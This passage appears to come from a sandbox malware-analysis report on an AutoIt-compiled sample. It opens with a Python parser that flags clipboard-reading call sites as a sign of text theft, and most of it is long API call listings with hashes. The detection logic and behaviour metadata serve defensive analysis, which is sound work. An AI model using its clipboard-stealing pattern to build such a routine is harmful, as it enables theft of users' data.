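    args: List[Optional[int]] = field(default_factory=list)
    subcall_of: Optional[int] = None


def parse_arg(tok: str) -> Optional[int]:
    """8 hex digits become an int; '?' (unresolved) or a literal such as a
    window class name becomes None."""
    tok = tok.strip()
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return None


def parse_api_list(text: str) -> List[ApiCall]:
    """Parse every well-formed listing line; ignore headers and blanks."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append(ApiCall(
            func=m.group("func"),
            module=m.group("module"),
            ref=int(m.group("ref"), 16),
            args=[parse_arg(a) for a in args.split(",")] if args else [],
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def clipboard_reads(calls: List[ApiCall]) -> List[dict]:
    """Report each GetClipboardData call site and the format it requests,
    provided the same function also calls OpenClipboard. The listing is
    ordered by address, not by execution, so an early-exit CloseClipboard
    between the two calls does not cancel the match."""
    if not any(c.func == "OpenClipboard" for c in calls):
        return []
    hits = []
    for c in calls:
        if c.func == "GetClipboardData" and c.args:
            fmt = c.args[0]
            name = "?" if fmt is None else CLIPBOARD_FORMATS.get(fmt, hex(fmt))
            hits.append({"ref": c.ref, "format": name})
    return hits


if __name__ == "__main__":
    for hit in clipboard_reads(parse_api_list(SAMPLE)):
        print(f"clipboard read at {hit['ref']:08X} requesting {hit['format']}")
```

Run against the listing above it reports two reads, CF_UNICODETEXT at 0046C64F and CF_TEXT at 0046C6DD, which is exactly the fallback order a text-stealing routine would use; the same parser can be pointed at any other "APIs" block on this page to build further rules (for example GetFileVersionInfoW followed by VerQueryValueW for the version-probe function further down).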
                                                                                          APIs
                                                                                          • GetCursorPos.USER32(?), ref: 00456692
                                                                                          • GetDesktopWindow.USER32 ref: 004566AA
                                                                                          • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                          • DestroyWindow.USER32(?), ref: 00456731
                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                          • IsWindowVisible.USER32(?), ref: 00456812
                                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                          • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                          • GetMonitorInfoW.USER32 ref: 00456894
                                                                                          • CopyRect.USER32(?,?), ref: 004568A8
                                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                          • String ID: ($,$tooltips_class32
                                                                                          • API String ID: 541082891-3320066284
                                                                                          • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                          • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                          • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                          • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 00454DCF
                                                                                          • _wcslen.LIBCMT ref: 00454DE2
                                                                                          • __wcsicoll.LIBCMT ref: 00454DEF
                                                                                          • _wcslen.LIBCMT ref: 00454E04
                                                                                          • __wcsicoll.LIBCMT ref: 00454E11
                                                                                          • _wcslen.LIBCMT ref: 00454E24
                                                                                          • __wcsicoll.LIBCMT ref: 00454E31
                                                                                            • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                          • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                          • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                          • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                          • String ID: .dll$.exe$.icl$Wu
                                                                                          • API String ID: 2511167534-3157294790
                                                                                          • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                          • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                          • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                          • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                          APIs
                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                          • _wcslen.LIBCMT ref: 00436B79
                                                                                          • _wcscpy.LIBCMT ref: 00436B9F
                                                                                          • _wcscat.LIBCMT ref: 00436BC0
                                                                                          • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                          • _wcscat.LIBCMT ref: 00436C2A
                                                                                          • _wcscat.LIBCMT ref: 00436C31
                                                                                          • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                          • _wcsncpy.LIBCMT ref: 00436C62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                          • API String ID: 1503153545-1459072770
                                                                                          • Opcode ID: 1bca29e3adc21336a21f3c01565ed382529ec8d4b1eae201a388b16e544b708b
                                                                                          • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                          • Opcode Fuzzy Hash: 1bca29e3adc21336a21f3c01565ed382529ec8d4b1eae201a388b16e544b708b
                                                                                          • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                          APIs
                                                                                            • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                          • _fseek.LIBCMT ref: 004527FC
                                                                                          • __wsplitpath.LIBCMT ref: 0045285C
                                                                                          • _wcscpy.LIBCMT ref: 00452871
                                                                                          • _wcscat.LIBCMT ref: 00452886
                                                                                          • __wsplitpath.LIBCMT ref: 004528B0
                                                                                          • _wcscat.LIBCMT ref: 004528C8
                                                                                          • _wcscat.LIBCMT ref: 004528DD
                                                                                          • __fread_nolock.LIBCMT ref: 00452914
                                                                                          • __fread_nolock.LIBCMT ref: 00452925
                                                                                          • __fread_nolock.LIBCMT ref: 00452944
                                                                                          • __fread_nolock.LIBCMT ref: 00452955
                                                                                          • __fread_nolock.LIBCMT ref: 00452976
                                                                                          • __fread_nolock.LIBCMT ref: 00452987
                                                                                          • __fread_nolock.LIBCMT ref: 00452998
                                                                                          • __fread_nolock.LIBCMT ref: 004529A9
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                          • __fread_nolock.LIBCMT ref: 00452A39
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                          • String ID:
                                                                                          • API String ID: 2054058615-0
                                                                                          • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                          • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                          • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                          • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: b9da739ef4394ef292cf8eb25369925a80ec30f337521dada9f854f90e9bbf21
                                                                                          • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                          • Opcode Fuzzy Hash: b9da739ef4394ef292cf8eb25369925a80ec30f337521dada9f854f90e9bbf21
                                                                                          • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                          APIs
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                          • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                          • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                          • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                          • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                          • GetClientRect.USER32(?,?), ref: 00470371
                                                                                          • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                          • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                          • String ID: AutoIt v3 GUI
                                                                                          • API String ID: 867697134-248962490
                                                                                          • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                          • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                          • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                          • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                          APIs
                                                                                          • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window
                                                                                          • String ID: 0
                                                                                          • API String ID: 2353593579-4108050209
                                                                                          • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                          • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                          • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                          • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                          APIs
                                                                                          • GetSysColor.USER32 ref: 0044A11D
                                                                                          • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                          • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                          • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                          • GetWindowDC.USER32 ref: 0044A277
                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                          • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                          • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                          • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                          • String ID:
                                                                                          • API String ID: 1744303182-0
                                                                                          • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                          • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                          • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                          • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll$__wcsnicmp
                                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                          • API String ID: 790654849-1810252412
                                                                                          • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                          • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                          • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                          • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                          • API String ID: 0-1896584978
                                                                                          • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                          • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                                          • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                          • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1927566239-0
                                                                                          • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                          • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                          • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                          • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                          APIs
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                          • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                          • IsWindow.USER32(?), ref: 0046DBDE
                                                                                          • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                          • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                          • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                            • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                          • API String ID: 1322021666-1919597938
                                                                                          • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                          • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                          • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                          • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
